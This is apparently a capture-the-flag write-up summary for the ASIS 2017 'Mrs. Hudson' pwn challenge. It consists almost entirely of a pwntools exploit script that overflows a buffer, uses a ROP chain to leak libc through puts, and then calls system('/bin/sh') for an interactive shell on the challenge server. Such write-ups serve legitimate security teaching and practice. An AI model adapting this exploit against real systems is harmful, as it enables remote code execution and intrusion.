Tags: pwn
Rating:
full writeup at https://teamrocketist.github.io/2017/09/10/Pwn-ASIS-Mrs-Hudson/
TLDR:
```
from pwn import *
import struct
import time
def getConn():
return process('./mrs._hudson', env = {"LD_PRELOAD":"./libc.so.6"}) if local else remote('178.62.249.106', 8642)
binary = ELF('./mrs._hudson')
libc = ELF('libc.so.6') # got libc from libc-database
local = False
POPRET = 0x00000000004006f3
PUTSPLT = binary.plt['puts']
PUTSGOT = binary.got['puts']
MAIN = 0x000000000040061A
padding = 'A' * 120
ropchain = ''
ropchain += p64(POPRET) # POP RDI; RET
ropchain += p64(PUTSGOT) # PUTS ADDRESS ARG[1]
ropchain += p64(PUTSPLT) # PRINTF function "call"
ropchain += p64(MAIN) # PRINTF function "call"
r = getConn()
r.recvline()
r.sendline(padding + ropchain)
PUTS = u64(r.recv(0x6).ljust(8, '\x00'))
LIBCBASE = PUTS - libc.symbols['puts']
SYSTEM = LIBCBASE + libc.symbols['system']
BINSH = LIBCBASE + 0x18cd17
log.info("LIBC 0x%x" % LIBCBASE)
log.info("LIBC 0x%x" % PUTS)
log.info("SYSTEM 0x%x" % SYSTEM)
log.info("Binsh 0x%x" % (BINSH))
r.recvline()
r.recvline()
r.sendline(padding + p64(POPRET) + p64(BINSH) + p64(SYSTEM))
r.interactive()
r.close()
```
